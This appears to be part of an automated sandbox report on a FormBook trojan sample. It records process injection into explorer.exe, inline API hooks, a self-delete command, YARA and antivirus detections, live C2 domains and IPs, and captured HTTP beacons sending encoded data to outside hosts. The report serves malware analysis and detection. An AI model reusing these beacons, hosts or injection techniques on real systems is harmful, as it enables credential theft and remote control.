              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]2_2_03881C06
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]2_2_03846C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]2_2_03846C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]2_2_03846C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03846C0A mov eax, dword ptr fs:[00000030h]2_2_03846C0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C58EC mov eax, dword ptr fs:[00000030h]2_2_037C58EC
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03847016 mov eax, dword ptr fs:[00000030h]2_2_03847016
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03847016 mov eax, dword ptr fs:[00000030h]2_2_03847016
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03847016 mov eax, dword ptr fs:[00000030h]2_2_03847016
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03894015 mov eax, dword ptr fs:[00000030h]2_2_03894015
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03894015 mov eax, dword ptr fs:[00000030h]2_2_03894015
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FF0BF mov ecx, dword ptr fs:[00000030h]2_2_037FF0BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FF0BF mov eax, dword ptr fs:[00000030h]2_2_037FF0BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037FF0BF mov eax, dword ptr fs:[00000030h]2_2_037FF0BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385C450 mov eax, dword ptr fs:[00000030h]2_2_0385C450
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_0385C450 mov eax, dword ptr fs:[00000030h]2_2_0385C450
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]2_2_037F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]2_2_037F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]2_2_037F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]2_2_037F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]2_2_037F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037F20A0 mov eax, dword ptr fs:[00000030h]2_2_037F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037D849B mov eax, dword ptr fs:[00000030h]2_2_037D849B
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03882073 mov eax, dword ptr fs:[00000030h]2_2_03882073
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_037C9080 mov eax, dword ptr fs:[00000030h]2_2_037C9080
              Source: C:\Windows\SysWOW64\help.exeCode function: 2_2_03891074 mov eax, dword ptr fs:[00000030h]2_2_03891074
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Code function: 0_2_0038ACE0 LdrLoadDll,0_2_0038ACE0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe Domain query: www.lipcarehub.africa
              Source: C:\Windows\explorer.exe Network Connect: 199.59.243.223 80
              Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
              Source: C:\Windows\explorer.exe Domain query: www.ecoskiusa.com
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: B50000
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Thread APC queued: target process: C:\Windows\explorer.exe
              Source: C:\Users\user\Desktop\S22Ls0H4Sz.exe Thread register set: target process: 3320
              Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3320
              Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"
              Source: explorer.exe, 00000001.00000002.511143864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.247877319.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
              Source: explorer.exe, 00000001.00000002.515728558.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.253308197.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.256946409.0000000007B83000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000001.00000000.247356405.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.510164477.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.511143864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: explorer.exe, 00000001.00000002.511143864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.247877319.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

              Stealing of Sensitive Information

Source: Yara match; File source: S22Ls0H4Sz.exe, type: SAMPLE
Source: Yara match; File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

Source: Yara match; File source: S22Ls0H4Sz.exe, type: SAMPLE
Source: Yara match; File source: 0.2.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.S22Ls0H4Sz.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Shared Modules | Path Interception | 512 Process Injection | 1 Rootkit | 1 Credential API Hooking | 121 Security Software Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | 1 Input Capture | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 4 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 512 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 3 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Source | Detection | Scanner | Label
S22Ls0H4Sz.exe | 79% | ReversingLabs | Win32.Trojan.FormBook
S22Ls0H4Sz.exe | 62% | Virustotal |
S22Ls0H4Sz.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
S22Ls0H4Sz.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
0.0.S22Ls0H4Sz.exe.380000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.S22Ls0H4Sz.exe.380000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ecoskiusa.com | 34.102.136.180 | true | false | | unknown
www.rodeosonline.uk | 199.59.243.223 | true | true | | unknown
www.lipcarehub.africa | unknown | unknown | true | | unknown
www.ecoskiusa.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
www.573415.com/dr62/ | true | Avira URL Cloud: safe | low
http://www.ecoskiusa.com/dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv | false | Avira URL Cloud: safe | unknown
http://www.rodeosonline.uk/dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv | true | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | ecoskiusa.com | United States | 15169 | GOOGLEUS | false
199.59.243.223 | www.rodeosonline.uk | United States | 395082 | BODIS-NJUS | true

Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830328
Start date and time: 2023-03-20 09:10:51 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: S22Ls0H4Sz.exe
Original Sample Name: 24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@6/1@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 63.4% (good quality ratio 57.1%)
• Quality average: 70.6%
• Quality standard deviation: 32.4%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 69
• Number of non-executed functions: 158
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 209.197.3.8
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
• Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          Time | Type | Description
                          09:12:00 | API Interceptor | 904x Sleep call for process: explorer.exe modified
                          Process:C:\Windows\explorer.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):984
                          Entropy (8bit):5.235042767122359
                          Encrypted:false
                          SSDEEP:24:Yq6CUXyhmbm1bNdB6hmAm1z0Jahmt3m1HZ6T06MhmCm1bxdB6hmLn7m17KTdB6hj:YqDUXycS1bNdUc91z0JacY1HZ6T06McU
                          MD5:33999D756DF6A0AD612142EC85171F4A
                          SHA1:4BEAF92A4F9CC7EF65016CCE6947DC39BEED0CFA
                          SHA-256:502DD040F98661D899DEDECE8A31871ECF7DDB4D4A76F7912B7BA42E8CF5CFA6
                          SHA-512:695D7EA65E71CECC1CB0B3D4B2587DC9DD7A5B5266C8F2DF689CBDF31537FB0D4E2628E9BEDE1C0E9622C8F48F38CF14585AD2C22BD0D873E253B93ACC812DAB
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2852487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2842487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2832487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2822487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2812487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2802487056,"LastSwitchedHighPart":30747939,"PrePopulated":true}]}
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.394457122288939
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.98%
                          • DOS Executable Generic (2002/1) 0.02%
                          File name:S22Ls0H4Sz.exe
                          File size:185856
                          MD5:883a36165d45cffa69e01d06532d3958
                          SHA1:4034cc0bc72a474fca5204528c658e6f79e0de4b
                          SHA256:24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4
                          SHA512:d136a91a0bf4e4ab8bf1152e33fbac22e4ee19bae6de8f11fd7488534cba42ccf2ac7b0e98a648e7712122dbf6ff3f471649e8b35572af7fc94131c7b35ea21e
                          SSDEEP:3072:SOd+EHnpnQrnYS3sxfFHLhZlJ6AoRh3kd/+fkuedOd7RoLG3yHY:ZPJFEsVF/L6AoRhA/gpoLZ
                          TLSH:C204AF32E601C071F2B252B5F67D0B7B4C3E0D347255A4AAA3E116E06EF59A5F12A31F
                          File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L......L............................ .............b........
                          Icon Hash:00828e8e8686b000
                          Entrypoint:0x63f120
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x620000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x4CB50DEB [Wed Oct 13 01:39:55 2010 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 64h
                          call 00007FCBBCB81EEAh
                          mov esp, ebp
                          pop ebp
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          call 00007FCBBCB81F33h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          jmp 00007FCBBCB81F96h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB83904h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB83907h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB8390Ah
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB8390Dh
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB83910h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB83913h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB83916h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          push 88888888h
                          jmp 00007FCBBCB83919h
                          ret
                          call 00007FCBBCB856B5h
                          pop eax
                          ret
                          Programming Language:
                          • [C++] VS2010 SP1 build 40219
                          • [ASM] VS2010 SP1 build 40219
                          • [LNK] VS2010 SP1 build 40219
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x2d184 | 0x2d200 | False | 0.7624653739612188 | data | 7.410112834615964 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Mar 20, 2023 09:12:51.637725115 CET | 192.168.2.7 | 8.8.8.8 | 0x3014 | Standard query (0) | www.rodeosonline.uk | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:13:12.398318052 CET | 192.168.2.7 | 8.8.8.8 | 0x83b0 | Standard query (0) | www.ecoskiusa.com | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:13:33.368184090 CET | 192.168.2.7 | 8.8.8.8 | 0xc56f | Standard query (0) | www.lipcarehub.africa | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Mar 20, 2023 09:12:51.671792030 CET | 8.8.8.8 | 192.168.2.7 | 0x3014 | No error (0) | www.rodeosonline.uk | | 199.59.243.223 | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:13:12.421821117 CET | 8.8.8.8 | 192.168.2.7 | 0x83b0 | No error (0) | www.ecoskiusa.com | ecoskiusa.com | | CNAME (Canonical name) | IN (0x0001) | false
                          Mar 20, 2023 09:13:12.421821117 CET | 8.8.8.8 | 192.168.2.7 | 0x83b0 | No error (0) | ecoskiusa.com | | 34.102.136.180 | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:13:33.575577021 CET | 8.8.8.8 | 192.168.2.7 | 0xc56f | Server failure (2) | www.lipcarehub.africa | none | none | A (IP address) | IN (0x0001) | false
                          • www.rodeosonline.uk
                          • www.ecoskiusa.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.7 | 49700 | 199.59.243.223 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Mar 20, 2023 09:12:51.698447943 CET | 111 | OUT | GET /dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv HTTP/1.1
                          Host: www.rodeosonline.uk
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 20, 2023 09:12:51.901387930 CET | 112 | IN | HTTP/1.1 200 OK
                          Server: openresty
                          Date: Mon, 20 Mar 2023 08:12:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: parking_session=13a79251-6be6-7bea-9801-dc5bea024080; expires=Mon, 20-Mar-2023 08:27:51 GMT; Max-Age=900; path=/; HttpOnly
                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_d5mqK6aUiHMmtQhnff3Fqd4rCdQvku2HF2ctvW7+UFQe0zbUXzTDajP0BfoJW9vdu8Uys5QHvYsjmlyP7Cnkjg==
                          Cache-Control: no-cache
                          Accept-CH: sec-ch-prefers-color-scheme
                          Critical-CH: sec-ch-prefers-color-scheme
                          Vary: sec-ch-prefers-color-scheme
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Cache-Control: no-store, must-revalidate
                          Cache-Control: post-check=0, pre-check=0
                          Pragma: no-cache
                          Data Ascii: 477<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_d5mqK6aUiHMmtQhnff3Fqd4rCdQvku2HF2ctvW7+UFQe0zbUXzTDajP0BfoJW9vdu8Uys5QHvYsjmlyP7Cnkjg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
                          Mar 20, 2023 09:12:51.901467085 CET | 113 | IN
                          Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMTNhNzkyNTEtNmJlNi03YmVhLTk4MDEtZGM1YmVhMDI0MDgwIiwicGFnZV90aW1lIjoxNjc5Mjk5OTcxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.7 | 49701 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Mar 20, 2023 09:13:12.441692114 CET | 114 | OUT | GET /dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv HTTP/1.1
                          Host: www.ecoskiusa.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 20, 2023 09:13:12.558031082 CET | 114 | IN | HTTP/1.1 403 Forbidden
                          Server: openresty
                          Date: Mon, 20 Mar 2023 08:13:12 GMT
                          Content-Type: text/html
                          Content-Length: 291
                          ETag: "6418120d-123"
                          Via: 1.1 google
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                          Code Manipulations

                          Function Name | Hook Type | Active in Processes
                          PeekMessageA | INLINE | explorer.exe
                          PeekMessageW | INLINE | explorer.exe
                          GetMessageW | INLINE | explorer.exe
                          GetMessageA | INLINE | explorer.exe
                          Function Name | Hook Type | New Data
                          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE1
                          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE1
                          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE1

                          Target ID:0
                          Start time:09:11:47
                          Start date:20/03/2023
                          Path:C:\Users\user\Desktop\S22Ls0H4Sz.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\S22Ls0H4Sz.exe
                          Imagebase:0x380000
                          File size:185856 bytes
                          MD5 hash:883A36165D45CFFA69E01D06532D3958
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
